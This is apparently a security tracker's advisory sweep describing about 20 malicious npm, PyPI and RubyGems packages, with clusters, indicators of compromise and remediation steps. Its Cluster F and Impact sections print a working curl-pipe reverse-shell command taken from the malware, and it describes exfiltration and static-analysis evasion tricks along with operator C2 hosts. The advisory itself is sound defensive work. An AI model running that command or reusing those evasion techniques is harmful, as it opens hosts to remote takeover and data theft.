Feed
HighAdvisory sweepPublished 24 Sept 202620 packages · 26 versions

GitHub Advisory malware sweep - 2026-09-23 (late) + 2026-09-24 (npm `@baanx/*` + `@insiderintelligence/componentlibrary` `oob.algamil7x.xyz` DNS-OOB day 7; `@rixxcodex/baileys` + `sea-baileys` Baileys-wave WhatsApp session-hijack extension; `pino-testkit` chai/pino/jsonspack family Function-constructor RCE; `vite-dev-launcher` `~/.gradle/caches/` sibling of yesterday`s `@vitemirrorte` mall4cloud-react RAT; pip `memoryos` maintainer-compromise infostealer + npm `@memtensor/memos-cloud-openclaw-plugin` openclaw plugin; `internallib_v657` + `internallib_v463` RFC1918 `10.0.73.186:443` curl-pipe reverse shell (new subnet vs v497/v550 `10.0.5.109`); `godzz`/`godzzz` Cloudflare-Worker + Groq API key exfil siblings; `com.apple.unityplugin.storekit` + `simplenewnpmpackage` shared `dapnhid534ch...oast.fun` recon beacons; `a-onesite`, `event-hunter`, `helpersutils-dev-tools` beacon-only probes; `hachutis` undeclared-binary trycloudflare tunnel; rubygems `wurl_show_data`)

Summary

GHSA 2026-09-23 (late) + 2026-09-24: ~25 new npm advisories + 1 pip + 1 rubygems. Day 7 of the oob.algamil7x.xyz DNS-OOB operator adds @baanx/common, @baanx/domain, and @insiderintelligence/componentlibrary. vite-dev-launcher@2.9.4 is a mall4cloud-react-RAT sibling of yesterdays @vitemirrorte. internallib_v657/v463` reverse shell to a new RFC1918 subnet.

dependency-confusiontyposquatdns-exfiltrationcredential-theftobfuscationci-cd-compromiseinfostealeraccount-takeovermaintainer-takeover
Incident type
Advisory sweep. A dated batch of GitHub Advisory Database malware entries collected together. A sweep mixes kinds - typosquats, dependency-confusion probes, boilerplate takedowns with no published analysis, and occasionally real payloads - and its severity reflects the worst confirmed item, not the batch as a whole.
Detected by
GitHub Advisory Database · OpenSSF malicious-packages · OpenSSF Package Analysis · Amazon Inspector · Safedep · kam193/bad-packages · jaschadub/compromised-packages-check
Also known as
2026-09-24 GHSA npm sweep · @baanx + @insiderintelligence algamil7x.xyz day 7 · @rixxcodex/baileys + sea-baileys WhatsApp session hijack · pino-testkit chai/pino/jsonspack family extension · vite-dev-launcher mall4cloud-react RAT sibling · memoryos PyPI maintainer compromise (2026-09-compr-memoryos) · internallib_v657 + internallib_v463 new-subnet reverse shell · godzz + godzzz Cloudflare Worker + Groq API key exfil · hachutis undeclared-binary trycloudflare tunnel
Ecosystems
npmPyPIRubyGems
Packages tracked
20

What happened

Between roughly 2026-09-23 12:00 UTC and 2026-09-24 12:00 UTC, GitHub Advisory Database (plus the OpenSSF malicious-packages bulk export, Amazon Inspectors IN-MAL feed, and Safedeps compromised-package tracker) published approximately 25 new npm malware advisories, 1 pip advisory, and 1 rubygems advisory. The window is dominated by day-7 continuation of the oob.algamil7x.xyz DNS-OOB operator, a Baileys-wave WhatsApp session-hijack extension, a chai/pino/jsonspack family pivot from chai-lures to pino-lures (pino-testkit), a mall4cloud-react-RAT sibling of yesterdays @vitemirrorte (vite-dev-launcher), one legitimate-maintainer PyPI account compromise (memoryos), and two internallib_v*` variants pointing at a new RFC1918 subnet.

Cluster A - @baanx/* + @insiderintelligence/componentlibrary oob.algamil7x.xyz DNS-OOB (day 7)

PackageGHSAStatus
@baanx/commonGHSA-27jh-hjhg-vg2pNew addition
@baanx/domainGHSA-qhfc-6rp6-pwv6New addition
@insiderintelligence/componentlibraryGHSA-rjh6-qm48-cg84New addition
@baanx/blockchain-configGHSA-f67m-pjx9-96cvSecondary advisory (already catalogued 2026-09-22 sweep)
@baanx/abisGHSA-598m-93qh-82f9Secondary advisory (already catalogued 2026-09-22 sweep)
@baanx/solana-libGHSA-5x34-3xqm-3r73Secondary advisory (already catalogued 2026-09-21 sweep)
@insiderintelligence/googleadmanagerGHSA-q699-336h-g385Secondary advisory (already catalogued 2026-09-19 sweep)

The three new adds continue the operators scope-per-day cadence (day 2 introduced @insiderintelligence/googleadmanager, day 5 introduced the @baanx/ scope with abis/blockchain-config, day 6 pivoted to @tvg-mar and @user-services, and today day 7 fills in two more @baanx/ variants and a new @insiderintelligence/componentlibrary`). GHSA bodies on the 2026-09-24 additions are CWE-506 boilerplate ("any computer that has this package installed should be considered fully compromised") but the scope, publish cadence, and operator continuity across nine days make the attribution unambiguous.

The operator now spans nine consecutive days (day 1: 2026-09-18 @tink/tink-link-core; day 7: 2026-09-24), all under the same oob.algamil7x.xyz DNS zone, same install-script primitive (scripts.install: node index.jsruntime/support/telemetry/probe/impl.jsmodule.constructor._load to bypass literal require(), String.fromCharCode hex-array obfuscation of destination and prefix), and same DNS-resolution exfil format (<prefix>-<user>-<host>-<cwd>.<ts>.oob.algamil7x.xyz). This is now the longest-running single-operator campaign in the DependencyWatch 2026 Q3 corpus.

Cluster B - Baileys-wave WhatsApp session-hijack extension

PackageVersionGHSAPrimitive
@rixxcodex/baileys8.0.15/8.0.16/8.1.0/8.2.0GHSA-fjxf-mv8f-cp6xThree undocumented channels + unpinned @rixxcodex/libsignal GitHub HEAD RCE
sea-baileys1.0.2GHSA-9xjg-g5r3-xpj8libsignal remapped to @otaxayun/libsignal-node@latest (mutable tag) + newsletter JID injection

@rixxcodex/baileys is a fork of the legitimate @whiskeysockets/baileys WhatsApp Web API library with three undocumented channelMetadata channels wired into the auth flow. The channel handlers pull remote configuration from GitHub raw JSON:

  • raw.githubusercontent.com/skyzopedia/Screaper/refs/heads/main/idChannel.json
  • raw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json

At runtime the channels use the installer`s authenticated WhatsApp session to perform whatever account actions the operator has configured in the JSON. The operator can add or remove actions live without republishing the npm package. skyzopedia is the same GitHub account seen in the 2026-09-19 @sanzoffc/baileys day-4 wave (raw.githubusercontent.com/skyzopedia/NewsletterID/*) - confirming a continuous Baileys-adjacent operator across at least 6 days.

Additionally the package.json declares @rixxcodex/libsignal as an unpinned github:rixxcodex/libsignal reference (no tag, no commit hash). Every install re-fetches whatever code is at GitHub HEAD, which means the operator has a live RCE channel inside the Signal encryption path without republishing the npm package.

sea-baileys@1.0.2 remaps the legitimate libsignal import to @otaxayun/libsignal-node@latest. The latest dist-tag is mutable, so the operator can push a fresh RCE at any time and it lands on every subsequent npm install. The routed data includes:

  • Signal Protocol identity private key
  • Signed pre-key private key
  • Session records
  • Sender keys

Separately, the library unconditionally attaches a hardcoded annotations block referencing newsletter JID 120363409928671192@newsletter to every outgoing media message - silent WhatsApp-message tampering distinct from the credential exfil.

Cluster C - pino-testkit chai/pino/jsonspack family Function-constructor RCE

pino-testkit@10.4.5 (GHSA-q57p-68r4-fj72). Impersonates the legitimate pino logging library end-to-end:

  • author field lists Matteo Collina (pino`s actual creator)
  • contributors list mirrors pino`s real maintainer list
  • README copied from pino with name substitutions only

The payload uses character-substitution + Fisher-Yates-style shuffle to reconstruct the string Function at runtime, then executes dynamically-constructed code via the Function constructor. Hoists require and module to global scope so any subsequent code can dynamically load any module.

Family context: this is the same operator arc as chai-tracker (2026-08-10), chai-testing (2026-09-21), chai-as-viem + chai-logger (2026-09-22 in yesterdays sweep). The pattern is a testing/logging library lure name → obfuscated Function-constructor RCE at import-time → real maintainer names as camouflage. Today marks the operators pivot from chai-plugin lures to pino-plugin lures under the same primitive.

Cluster D - vite-dev-launcher mall4cloud-react-RAT sibling

vite-dev-launcher@2.9.4 (GHSA-pg2r-jxrr-mx5j). Triple-trigger payload: postinstall hook + direct require() + CLI invocation. Payload is base64 + AES-256-GCM + XOR obfuscated and only decrypts when the current workspace fingerprints match hardcoded file hashes (targeted repository lock so the malware stays dormant in sandboxes and generic dev environments).

Once active, the payload reconstructs a full C2 endpoint set at runtime:

  • Agent registration
  • Task polling
  • Result submission
  • File transfer

Persistence path is ~/.gradle/caches/transforms-3/8.7/instrumented/... disguised as a legitimate Gradle instrumentation artifact.

This is the same primitive as yesterdays @vitemirrorte/element-plus-vite-cli@2.9.1` (Cluster G of the 2026-09-23 sweep) - same ~/.gradle/caches/ persistence, same workspace-hash-gated activation, same C2 opcode set. Treat as the same operator running a fresh scope name. Yesterdays C2 domain was npmjs.it.com; todays advisory redacts the C2 host but the code path and infrastructure pattern are otherwise identical.

Cluster E - memoryos PyPI maintainer compromise + @memtensor/memos-cloud-openclaw-plugin npm

PackageVersionGHSACampaign
memoryos (pip)2.0.34GHSA-hxf9-rvj5-h45h2026-09-compr-memoryos
@memtensor/memos-cloud-openclaw-plugin (npm)0.1.21/0.1.23/0.1.25GHSA-mhjf-v53x-7p87(unassigned)

memoryos@2.0.34 is a maintainer-account compromise of a legitimate PyPI package (MemoryOS is a memory-augmented AI framework with prior legitimate releases). The compromised version publishes with "clearly malicious intent, like infostealers" per Safedeps classification. VirusTotal detection is available. This is *not* a supply-chain injection or a typosquat - it is the same package name published by an attacker who took over the maintainer account. Anyone who ran pip install memoryos==2.0.34` between publish and yank installed the infostealer.

@memtensor/memos-cloud-openclaw-plugin (npm, three versions from Sept 23) - the -openclaw-plugin suffix matches the openclaw plugin-loader family tracked earlier in the corpus. Both packages target the MemoryOS/Memos memory-augmented AI ecosystem in the same 48-hour window; the coordinated attention on that specific ecosystem is worth flagging even though the underlying operators may differ.

Cluster F - internallib_v* enumeration extension (new RFC1918 subnet)

PackageVersionGHSAReverse-shell target
internallib_v6571.0.1GHSA-w2wx-86qr-g53310.0.73.186:443
internallib_v4631.0.2GHSA-gv94-v8fj-f45c10.0.73.186:443 (via reverse-shell.sh)
internallib_v497 (re-issue)(existing)GHSA-94q5-67r5-mwjxAlready catalogued as GHSA-m9ww-2r6q-x632 in 2026-09-23 sweep - not re-added

Both new packages export a command() function that runs "/bin/bash -c 'curl https://reverse-shell.sh/10.0.73.186:443|sh'" - the same reverse-shell.sh curl-pipe primitive as prior internallib_v* versions, but pointed at a new RFC1918 target: 10.0.73.186:443 (previous versions catalogued through 2026-09-23 all pointed at 10.0.5.109). Code carries the string "Primeiro PWN" (Portuguese for "First PWN") - the same operator signature marker seen in some internallib_v* packages earlier in the campaign.

Continuation of the internallib_v<NNN> sequential-enumeration campaign tracked since 2026-08-03. The new subnet suggests the operator is either testing against multiple internal networks or has pivoted to a new engagement.

Cluster G - godzz + godzzz Cloudflare-Worker + Groq API-key exfil

PackageVersionGHSABehaviour
godzz1.0.0GHSA-p6cq-66pp-9r5gDisables TLS validation globally; scrapes Chromium CDP 127.0.0.1:9222; exfils to ai-script.test0ing7.workers.dev; distributes bundled Groq API key
godzzz1.0.0GHSA-6j9r-v67w-r8w4cdp_inject.js host-info + file-read + base64 + HTTP POST exfil

godzz is the more detailed of the pair. On load:

  1. process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0" (disables TLS certificate validation for the entire Node process, which persists for the process lifetime)
  2. Connects to the local Chromium DevTools Protocol endpoint at 127.0.0.1:9222 - this is the well-known DevTools debug port and any developer running Chromium with --remote-debugging-port=9222 (or the default for Puppeteer/Playwright dev workflows) is exposing all active browser sessions
  3. Extracts active page content and active editor text from every open Chromium page
  4. Base64-encodes the harvested data and POSTs to the operators Cloudflare Worker at ai-script.test0ing7.workers.dev`

Additionally the package ships an embedded Groq API key (gsk_... prefix) that is distributed to every installer. The operator built a redistribution vector for their own Groq quota - anyone who uses the package inherits the operators bundled key and any prompts the operator has embedded run under the operators tenant. This is unusual and worth flagging as a new lateral pattern.

godzzz ships a cdp_inject.js file with the same host-info + file-read + credential-exfil shape (reads process.env.USER, fs.readFileSync/fs.existsSync for local files, base64 encoding, https.request/http.get POSTs). Sibling relationship to godzz is inferred from name, purpose, and same-day publish.

Cluster H - Shared-domain recon beacons

PackageVersionGHSABeacon target
com.apple.unityplugin.storekit1.0.2GHSA-6r46-f382-x53pdapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun (Interactsh)
simplenewnpmpackage1.0.2GHSA-mr2p-c47m-85w8dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun (same subdomain)
a-onesite99.9.9GHSA-9j7m-m3w9-mgrchttp://eoy34oyrep9j5x8.m.pipedream.net (unencrypted HTTP wget)
event-hunter1.0.0GHSA-wwrq-gcqx-rx6phttps://estimator-nemeses-unwatched.ngrok-free.dev/canary?d=<base64>
helpersutils-dev-tools1.0.11GHSA-w43w-f8m4-5r39http://5.189.173.113:8899/csp-edu + /csp (direct-IP HTTP)

The first two packages (com.apple.unityplugin.storekit and simplenewnpmpackage) beacon to the exact same Interactsh subdomain - one operator running two lures against the same OOB listener. The com.apple.unityplugin.storekit name is a plausible internal-name dep-confusion lure (Apple/Unity StoreKit integration), the simplenewnpmpackage name is a "how far can I get with the most obvious name" test.

a-onesite@99.9.9 uses the sentinel 99.9.9 dep-confusion version marker with unencrypted-HTTP wget to a Pipedream endpoint (the operator gets a dashboard of every install). event-hunter self-labels as a "Dependency Confusion to RCE proof-of-concept" and uses an ngrok tunnel. helpersutils-dev-tools beacons to a fixed IP:port with two paths (/csp-edu, /csp) suggesting a bucketing or campaign-tagging scheme.

All five are recon-only (no secret material exfiltrated beyond hostname/platform/OS-username/domain), but the fact that so many independent dep-confusion probes are landing in the same 48-hour window is worth flagging as an ecosystem-wide indicator of active internal-registry attention.

Cluster I - hachutis undeclared-binary trycloudflare tunnel

hachutis@1.0.0/1.0.6 (GHSA-9rj9-xh7c-qqh8). Ships three prebuilt executables under bin/:

  • bin/cli
  • bin/cli-linux-amd64
  • bin/cli-http-linux

None of these are declared in the package.json bin field or the files field. Legitimate-looking JavaScript serves as decoy for the opaque native payloads. When run, the binaries open a channel from the installers host to a Cloudflare Tunnel operator-controlled endpoint at already-query-bacteria-agreed.trycloudflare.com`.

Binary hash: 455f1d04545c9ed17722705fe61415d7e536e2800c2a3c588ab69985004c73b9. Same architectural class as the bytepack-probe-a7x3 transitive-dep pattern from 2026-09-22 - malicious functionality hidden in non-declared files rather than the exported API.

Cluster J - rubygems wurl_show_data OSSF-flagged malware

wurl_show_data@3.1.42.99 (GHSA-345f-5r88-8j64) - OpenSSF Package Analysis flagged the version as executing commands associated with malicious behavior. No further analysis published. Package hash 17d2e80b42383fadbe9bde12ef17decad8b9dfa9b48f93b6e7f9162091e2a69d. Treat as install-time compromise pending IOC publication.

Cross-operator patterns worth flagging

  1. The oob.algamil7x.xyz operator is on day 7 (day 1 was 2026-09-18 @tink/tink-link-core) - nine consecutive days with a fresh internal-lookalike scope each day but the same DNS zone, code style, and primitive. Still the longest-running single-operator campaign in the DependencyWatch 2026 Q3 corpus.
  2. The ~/.gradle/caches/ persistence + workspace-hash-gated activation class is now confirmed across at least two operator scopes (@vitemirrorte yesterday, vite-dev-launcher today). Any Vite/Vue/React-plugin-adjacent lure that ships an install/postinstall script and touches ~/.gradle/caches/ should be treated as a member of this family.
  3. The chai/pino/jsonspack Function-constructor RCE arc has pivoted from chai-plugin lures to pino-plugin lures under the same primitive. pino-testkit today extends chai-tracker (Aug 10) → chai-testing (Sep 21) → chai-as-viem/chai-logger (Sep 22). Expect more pino-* variants to surface.
  4. The Baileys wave now spans at least three operator identities (@sanzoffc/baileys day 4 on Sep 19, @rixxcodex/baileys today with the same skyzopedia GitHub raw endpoints, sea-baileys today with a different unpinned-libsignal primitive). Any Baileys wrapper from an unfamiliar scope should be treated as suspect.
  5. *The `internallib_v enumeration campaign has pivoted subnet** from 10.0.5.109 to 10.0.73.186` on 2026-09-23. Two subnets means two engagements or two operator infrastructure sets - review your CI network egress logs for either subnet.
  6. Legitimate-maintainer PyPI account compromises are back with memoryos@2.0.34. This class of incident is distinct from typosquats and dep-confusion probes - the package name is real, the prior versions are legitimate, and the compromised version passes any name-based allowlist. Version-pinning is the mitigation.

Registry state

All packages in Clusters A, C, D, E, F, G, H, I, J are npm/pip/rubygems-quarantined (replaced with holding packages). Cluster Bs Baileys packages appear to still be live at the time of writing given the age of the versions (@rixxcodex/baileys@8.2.0 is only a few days old). C2 infrastructure remains active in every cluster: oob.algamil7x.xyz, skyzopedia/* GitHub raw endpoints, npmjs.it.com (from yesterdays @vitemirrorte), test0ing7.workers.dev, dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun, eoy34oyrep9j5x8.m.pipedream.net, estimator-nemeses-unwatched.ngrok-free.dev, 5.189.173.113, already-query-bacteria-agreed.trycloudflare.com, 10.0.73.186, 10.0.5.109.

Discovery credits

GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis, Amazon Inspector, Safedep, kam193/bad-packages, jaschadub/compromised-packages-check. Per-package IOC details drawn from GHSA and OpenSSF advisory bodies published between 2026-09-23 12:00 UTC and 2026-09-24 12:00 UTC.

Affected packages (20)

These are usually pulled in as transitive dependencies rather than installed directly. Check your whole tree at once - it runs in your browser and nothing is uploaded.

Impact

  • *Cluster A - npm `@baanx/ + @insiderintelligence/componentlibrary oob.algamil7x.xyz DNS-OOB (day 7 of the operator)**: @baanx/common (GHSA-27jh-hjhg-vg2p), @baanx/domain (GHSA-qhfc-6rp6-pwv6), and @insiderintelligence/componentlibrary (GHSA-rjh6-qm48-cg84) - all three published 2026-09-24 as fresh additions to the @baanx/ and @insiderintelligence/ scopes the operator has been iterating since day 2 (2026-09-19). GHSA bodies are CWE-506 boilerplate on the 2026-09-24 additions but the scope, publish cadence, and operator continuity make the attribution unambiguous. Also on 2026-09-24: additional GHSA numbers reissued against @baanx/blockchain-config (GHSA-f67m-pjx9-96cv), @baanx/abis (GHSA-598m-93qh-82f9), @baanx/solana-lib (GHSA-5x34-3xqm-3r73), and @insiderintelligence/googleadmanager (GHSA-q699-336h-g385) - these are secondary advisory records for packages already catalogued in the [2026-09-19](/incident/multi-2026-09-19-ghsa-malware-sweep) (day 2) and [2026-09-22](/incident/multi-2026-09-22-ghsa-malware-sweep) (day 5) sweeps, and do not represent new drops. The operator is now on a nine-consecutive-day run with the same DNS zone, same install-script primitive (module.constructor._load to defeat static analysis, String.fromCharCode` hex-array obfuscation of destination), and fresh scope names each day
  • Cluster B - npm Baileys-wave WhatsApp session-hijack extension: @rixxcodex/baileys@8.0.15/8.0.16/8.1.0/8.2.0 (GHSA-fjxf-mv8f-cp6x) - WhatsApp library fork with three undocumented channels that use the installers authenticated WhatsApp session to perform account actions chosen by the author at runtime; remote configuration lists pulled from raw.githubusercontent.com/skyzopedia/Screaper/refs/heads/main/idChannel.json and raw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json (same skyzopedia GitHub account seen in the 2026-09-19 @sanzoffc/baileys day-4 wave), and an unpinned dependency on @rixxcodex/libsignal via GitHub HEAD that executes arbitrary code within the Signal encryption path with no integrity check. sea-baileys@1.0.2 (GHSA-9xjg-g5r3-xpj8) - remaps libsignal to @otaxayun/libsignal-node@latest (mutable tag - operator can push a fresh RCE at any time) which routes the installers Signal Protocol identity private key, signed pre-key private key, session records, and sender keys through an uncontrolled third-party dep; also unconditionally attaches a hardcoded newsletter JID 120363409928671192@newsletter annotation to every outgoing media message
  • Cluster C - npm pino-testkit chai/pino/jsonspack family Function-constructor RCE (extension of the family tracked since Aug): pino-testkit@10.4.5 (GHSA-q57p-68r4-fj72). Impersonates the legitimate pino logging library end-to-end: lists Matteo Collina (pinos real creator) as author and actual pino maintainers as contributors, and copies pinos README verbatim with name substitutions. Payload uses character substitution and a Fisher-Yates-style shuffle to reconstruct the string Function, then executes dynamically-constructed code via the Function constructor. Hoists require and module to global scope to enable arbitrary module loading. Same author-fingerprinting + pino-cover-story + Function-constructor pattern as chai-logger@3.0.2 catalogued in yesterdays sweep and chai-testing/chai-tracker/chai-as-viem` earlier in the arc. The operator has now pivoted from chai-plugin lures to pino-plugin lures under the same primitive
  • Cluster D - npm vite-dev-launcher mall4cloud-react-RAT sibling (~/.gradle/caches/ persistence, same operator as yesterdays @vitemirrorte`): vite-dev-launcher@2.9.4 (GHSA-pg2r-jxrr-mx5j). Postinstall hook + direct require() + CLI invocation all trigger the payload. Payload is AES-256-GCM + XOR-obfuscated and only decrypts when workspace file hashes match hardcoded values (targeted repository fingerprinting to evade sandbox analysis). C2 endpoint set (agent register, task poll, result submit, file transfer) reconstructed at runtime from base64. Persistence path is ~/.gradle/caches/transforms-3/8.7/instrumented/... - identical directory pattern to yesterdays @vitemirrorte/element-plus-vite-cli@2.9.1` which lodges into ~/.gradle/caches/, targets workspace mall4cloud-react, and beacons to npmjs.it.com. Treat as the same operator running a fresh scope; block the same C2 posture. Any developer who ran npm install vite-dev-launcher on a mall4cloud-react fork on 2026-09-23/24 has an active persistent implant
  • Cluster E - pip memoryos maintainer-account compromise infostealer + npm @memtensor/memos-cloud-openclaw-plugin openclaw plugin: pip memoryos@2.0.34 (GHSA-hxf9-rvj5-h45h, campaign 2026-09-compr-memoryos) - not a supply-chain injection but an account compromise of the MemoryOS PyPI maintainer, with the compromised version publishing "clearly malicious intent, like infostealers" (Safedep classification). VirusTotal detection available. npm @memtensor/memos-cloud-openclaw-plugin@0.1.21/0.1.23/0.1.25 (GHSA-mhjf-v53x-7p87) - the -openclaw-plugin suffix matches the openclaw plugin-loader family tracked earlier in the corpus. Both target the MemoryOS/Memos memory-augmented AI ecosystem in the same 48-hour window; treat as coordinated attention on that specific project
  • *Cluster F - npm `internallib_v enumeration extension (new RFC1918 subnet)**: internallib_v657@1.0.1 (GHSA-w2wx-86qr-g533) and internallib_v463@1.0.2 (GHSA-gv94-v8fj-f45c). Both export a command() function that runs "/bin/bash -c 'curl https://reverse-shell.sh/10.0.73.186:443|sh'" - the same reverse-shell.sh curl-pipe primitive as prior internallib_v` versions, but pointed at a new RFC1918 target: 10.0.73.186:443 (previous versions catalogued through 2026-09-23 all pointed at 10.0.5.109). Code carries the string "Primeiro PWN" (Portuguese for "First PWN") - the same operator signature marker seen in some `internallib_v packages earlier in the campaign. Continuation of the internallib_v<NNN> sequential-enumeration campaign tracked since 2026-08-03 (previous versions catalogued: _v497, _v514, _v524, _v550, _v568, _v688, _v756, _v902, _v949). Also on 2026-09-24: internallib_v497 gets a secondary GHSA-94q5-67r5-mwjx (already catalogued as GHSA-m9ww-2r6q-x632` in the 2026-09-23 sweep - this sweep does not re-add it). The new subnet suggests the operator is testing against multiple internal networks or pivoting to a new engagement
  • Cluster G - npm godzz/godzzz Cloudflare-Worker + Groq API key exfil siblings: godzz@1.0.0 (GHSA-p6cq-66pp-9r5g) - sets process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0" on load (disables TLS certificate validation for the entire Node process), connects to the local Chromium DevTools Protocol endpoint at 127.0.0.1:9222 to extract active page content and editor text, base64-encodes the harvested data, and exfiltrates it to a Cloudflare Worker at ai-script.test0ing7.workers.dev. Ships an embedded Groq API key (gsk_...) that is redistributed to all installers - if an installer uses the package, they inherit the operators Groq quota and any prompts the operator has embedded run under their tenant. godzzz@1.0.0 (GHSA-6j9r-v67w-r8w4) - sibling package with a cdp_inject.js file that reads process.env.USER and files via fs.readFileSync/fs.existsSync, base64-encodes, and POSTs via https.request/http.get`. Same host-info/credential-exfil stager shape. The two-package variant and identical primary purpose suggest one operator publishing under two names
  • Cluster H - npm shared-domain recon beacons (dependency-confusion / reconnaissance): com.apple.unityplugin.storekit@1.0.2 (GHSA-6r46-f382-x53p) - impersonates an Apple/Unity StoreKit internal namespace, falsely claims authorship by Apple, Inc; on module load issues an HTTPS GET to dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun (Project Discovery Interactsh) transmitting package name, OS platform, hostname as query params. simplenewnpmpackage@1.0.2 (GHSA-mr2p-c47m-85w8) - shares the exact same dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun subdomain as com.apple.unityplugin.storekit; on load beacons platform + hostname to the same URL. One operator running multiple lures against the same Interactsh listener. a-onesite@99.9.9 (GHSA-9j7m-m3w9-mgrc) - preinstall/preupdate/test scripts all wget http://eoy34oyrep9j5x8.m.pipedream.net with username, cwd, hostname over unencrypted HTTP; sentinel 99.9.9 classic dep-confusion attention-getter. event-hunter@1.0.0 (GHSA-wwrq-gcqx-rx6p) - self-labelled "Dependency Confusion to RCE proof-of-concept"; ngrok tunnel estimator-nemeses-unwatched.ngrok-free.dev/canary?d=<base64> receives os.hostname() + timestamp. helpersutils-dev-tools@1.0.11 (GHSA-w43w-f8m4-5r39) - direct-IP beacon to http://5.189.173.113:8899/csp-edu and /csp on load; sibling bypass.js file carries the identical beacon
  • Cluster I - npm hachutis undeclared-binary trycloudflare tunnel: hachutis@1.0.0/1.0.6 (GHSA-9rj9-xh7c-qqh8). Ships three undeclared prebuilt executables under bin/: bin/cli, bin/cli-linux-amd64, bin/cli-http-linux - not declared in package.json bin/files and never installed as CLI shims, but present on disk in every install. Legitimate-looking JavaScript code serves as decoy for opaque native binaries. Running any of the binaries opens a channel from the installers host to already-query-bacteria-agreed.trycloudflare.com (a Cloudflare Tunnel operator-controlled endpoint). Hash 455f1d04545c9ed17722705fe61415d7e536e2800c2a3c588ab69985004c73b9`
  • Cluster J - rubygems wurl_show_data OSSF-flagged malware (payload not disclosed): wurl_show_data@3.1.42.99 (GHSA-345f-5r88-8j64) - OpenSSF Package Analysis flagged as executing commands associated with malicious behavior. No further analysis published. Hash 17d2e80b42383fadbe9bde12ef17decad8b9dfa9b48f93b6e7f9162091e2a69d. Treat as install-time compromise pending IOC publication

What to do

  1. 1Grep every package-lock.json, yarn.lock, pnpm-lock.yaml, package.json, requirements.txt, Pipfile.lock, poetry.lock, and Gemfile.lock in your org for every package name in Clusters A through J. Uninstall on hit, wipe node_modules/.venv/vendor/, delete the lockfile, rebuild against a clean cache. Clusters B, C, D, E, F, G, H, and I all include confirmed real payloads (WhatsApp session hijack, Function-constructor RCE, targeted RAT with Gradle-cache persistence, infostealer, curl-pipe reverse shell, credential/API-key exfil, recon beacons, undeclared native binaries) - a hit on any of those is a compromise, not a warning
  2. 2*For Cluster A (`@baanx/ + @insiderintelligence/` algamil7x day 7): keep the oob.algamil7x.xyz resolver block in place from prior days (this is now nine consecutive days from the same operator). The .xyz zone block is the durable mitigation because the operator picks a fresh internal-lookalike scope every 24 hours. Rotate any credential accessible from a host that install-ran any `@baanx/ or @insiderintelligence/*` package in the last two weeks
  3. 3For Cluster B (@rixxcodex/baileys + sea-baileys): uninstall on hit and treat the associated WhatsApp session as fully compromised - revoke it in Linked Devices, reset the account password if you use one, review recent linked-device activity for unfamiliar sessions. Rotate any Signal identity keys if the package touched a real Signal or WhatsApp session. Block GitHub raw content requests to raw.githubusercontent.com/skyzopedia/* at CI egress. Any Baileys wrapper installed from an unfamiliar scope should be uninstalled and replaced with @whiskeysockets/baileys from the official maintainer
  4. 4For Cluster C (pino-testkit chai/pino/jsonspack family extension): audit any pino or chai plugin your projects import for author-metadata spoofing (real pino/chai maintainers listed as author/contributors on packages they never authored is a strong indicator). --ignore-scripts does NOT block this family - the RCE fires when the module is loaded, not on install. Block jsonspack.com at CI egress (same infrastructure as the chai-family; new lure name, same operator)
  5. 5For Cluster D (vite-dev-launcher mall4cloud-react RAT sibling): block npmjs.it.com at your resolver AND at your web proxy (established C2 domain for this operator from yesterdays @vitemirrorte incident). If any developer or CI runner touched a mall4cloud-react fork in the last 72h and installed vite-dev-launcher, @vitemirrorte/element-plus-vite-cli, or any Vite-adjacent package under an unfamiliar scope, assume that workstation is fully compromised: image it, do not attempt in-place cleanup. Rotate every credential visible to the parent Node process (SSH keys, cloud tokens, git credentials, IDE tokens). Delete ~/.gradle/caches/transforms-3/` on remediated hosts and rebuild Gradle from a known-clean source
  6. 6For Cluster E (memoryos PyPI + @memtensor/memos-cloud-openclaw-plugin npm): uninstall on hit. For memoryos, this is a maintainer-account compromise of a legitimate PyPI package - anyone who ran pip install memoryos==2.0.34 between publish and yank has an infostealer already exfiltrated. Rotate all cloud provider access keys and IAM session tokens on any host that installed the version. Verify the current published memoryos version is from the legitimate maintainer, not a re-uploaded compromised version
  7. 7For Cluster F (internallib_v657 + internallib_v463 new-subnet reverse shell): block outbound HTTP to 10.0.73.186 AND 10.0.5.109 at CI network egress (both subnets are now confirmed operator infrastructure). Block reverse-shell.sh at CI egress (unencrypted-HTTP curl-pipe from install-time is the primitive). If your org runs any internallib_v<NNN> internal scope, the campaign has enumerated your version numbers now across two subnets - review your private-registry access logs for any public-npm resolution attempts against the internallib_v* naming pattern
  8. 8For Cluster G (godzz/godzzz credential exfil): uninstall on hit. If any developer installed either package, they have to (a) revoke and rotate any Groq API key the compromised process could have seen (the operators bundled gsk_... key is *distributed* by the malware but the local Groq key in .env or ~/.config/groq/ is also read), (b) close any open Chromium browser session that had DevTools Protocol enabled - the malware read active page content and editor text, so any authenticated session in the browser (SSO, email, cloud console) is exfiltrated, (c) block test0ing7.workers.dev at your resolver. The NODE_TLS_REJECT_UNAUTHORIZED=0` side-effect persists for the lifetime of any long-running Node process the package touched
  9. 9For Cluster H (recon-only beacons): uninstall on hit. Rotate no credentials (these packages beacon platform + hostname only, no secret material). Block oast.fun, pipedream.net, ngrok-free.dev, and direct-IP outbound HTTP from CI to 5.189.173.113 at network egress. com.apple.unityplugin.storekit should be pinned to your internal registry with .npmrc if your org has any Unity/Apple StoreKit integration - the name is a plausible internal-name lure
  10. 10For Cluster I (hachutis undeclared-binary tunnel): uninstall on hit. Any host that ran the CLI - directly or via a package that transitively invoked the binary - has an established Cloudflare Tunnel channel to the operator. Block *.trycloudflare.com at CI egress by default and allowlist only the tunnels your org actually uses. Grep node_modules/*/bin/ for undeclared binaries (not declared in package.json bin field) as a general hygiene sweep - this pattern is showing up more often across the corpus
  11. 11For Cluster J (wurl_show_data rubygems): uninstall on hit. Payload is undisclosed so treat as install-time compromise; rotate credentials accessible from any host that ran bundle install on a Gemfile that pinned the version
